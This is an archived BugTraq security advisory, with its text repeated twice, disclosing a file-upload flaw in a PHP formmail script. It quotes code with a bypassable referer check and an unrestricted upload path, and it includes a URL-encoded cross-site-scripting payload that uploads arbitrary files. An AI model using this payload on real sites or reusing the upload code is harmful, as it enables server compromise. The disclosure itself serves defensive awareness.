BugTraq
Back to list
|
Post reply
formmail (PHP) Upload file using CSS
Feb 06 2004 11:36AM
Himeur Nourredine (lostnoobs security-challenge com)
Informations :
°°°°°°°°°°°°°°
Website : http://www.dtheatre.com/scripts/
Version : all
Problem : Upload file
PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
formmail.php :
------------------------------------------------------------------
function check_referer($referers) {
if (count($referers)) {
$found = false;
$temp = explode("/",getenv("HTTP_REFERER"));
$referer = $temp[2];
if ($referer=="") {$referer = $_SERVER['HTTP_REFERER'];
list($remove,$stuff)=split('//',$referer,2);
list($home,$stuff)=split('/',$stuff,2);
$referer = $home;
}
for ($x=0; $x < count($referers); $x++) {
if (eregi ($referers[$x], $referer)) {
$found = true;
}
}
if ($referer =="")
$found = false;
if (!$found){
print_error("You are coming from an <b>unauthorized domain.</b>");
error_log("[FormMail.php] Illegal Referer. (".getenv("HTTP_REFERER").")", 0);
}
return $found;
} else {
return true; // not a good idea, if empty, it will allow it.
}
}
------------------------------------------------------------------
...
------------------------------------------------------------------
// check for a file if there is a file upload it
if ($file_name) {
if ($file_size > 0) {
if (!ereg("/$", $path_to_file))
$path_to_file = $path_to_file."/";
$location = $path_to_file.$file_name;
if (file_exists($path_to_file.$file_name))
$location = $path_to_file.rand(1000,3000).".".$file_name;
copy($file,$location);
unlink($file);
$content .= "Uploaded File: ".$location."\n";
}
}
------------------------------------------------------------------
You can bypassing the REFERER protection and put a file on the site (for exemple with a Cross Site Scripting on the same site).This option running even if this function is desactivated.
Exploit :
°°°°°°°°°
http://www.exemple.com/foo.php?css=<form%20method=post%20enctype=multipa
rt/form-data%20action=formmail.php><input%20type=hidden%20name=MAX_FILE_
SIZE%20value=1000000><input%20type=hidden%20name=path_to_file%20value=./
><input%20type=text%20name=email><input%20type=file%20name=file%20><inpu
t%20type=hidden%20name=recipient%20%20value=%20foo (at) foo (dot) com [email concealed]%20><input%20t
ype=submit>
Whith :
http://www.exemple.com/formmail.php
and
http://www.exemple.com/file.php?css= <-- Cross Site Scripting Here
For More details :
°°°°°°°°°°°°°°
IRC : hauzgur.serveirc.com / #defaced
Nourredine Himeur
www.security-challenge.com
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Informations :
°°°°°°°°°°°°°°
Website : http://www.dtheatre.com/scripts/
Version : all
Problem : Upload file
PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
formmail.php :
------------------------------------------------------------------
function check_referer($referers) {
if (count($referers)) {
$found = false;
$temp = explode("/",getenv("HTTP_REFERER"));
$referer = $temp[2];
if ($referer=="") {$referer = $_SERVER['HTTP_REFERER'];
list($remove,$stuff)=split('//',$referer,2);
list($home,$stuff)=split('/',$stuff,2);
$referer = $home;
}
for ($x=0; $x < count($referers); $x++) {
if (eregi ($referers[$x], $referer)) {
$found = true;
}
}
if ($referer =="")
$found = false;
if (!$found){
print_error("You are coming from an <b>unauthorized domain.</b>");
error_log("[FormMail.php] Illegal Referer. (".getenv("HTTP_REFERER").")", 0);
}
return $found;
} else {
return true; // not a good idea, if empty, it will allow it.
}
}
------------------------------------------------------------------
...
------------------------------------------------------------------
// check for a file if there is a file upload it
if ($file_name) {
if ($file_size > 0) {
if (!ereg("/$", $path_to_file))
$path_to_file = $path_to_file."/";
$location = $path_to_file.$file_name;
if (file_exists($path_to_file.$file_name))
$location = $path_to_file.rand(1000,3000).".".$file_name;
copy($file,$location);
unlink($file);
$content .= "Uploaded File: ".$location."\n";
}
}
------------------------------------------------------------------
You can bypassing the REFERER protection and put a file on the site (for exemple with a Cross Site Scripting on the same site).This option running even if this function is desactivated.
Exploit :
°°°°°°°°°
http://www.exemple.com/foo.php?css=<form%20method=post%20enctype=multipa
rt/form-data%20action=formmail.php><input%20type=hidden%20name=MAX_FILE_
SIZE%20value=1000000><input%20type=hidden%20name=path_to_file%20value=./
><input%20type=text%20name=email><input%20type=file%20name=file%20><inpu
t%20type=hidden%20name=recipient%20%20value=%20foo (at) foo (dot) com [email concealed]%20><input%20t
ype=submit>
Whith :
http://www.exemple.com/formmail.php
and
http://www.exemple.com/file.php?css= <-- Cross Site Scripting Here
For More details :
°°°°°°°°°°°°°°
IRC : hauzgur.serveirc.com / #defaced
Nourredine Himeur
www.security-challenge.com
[ reply ]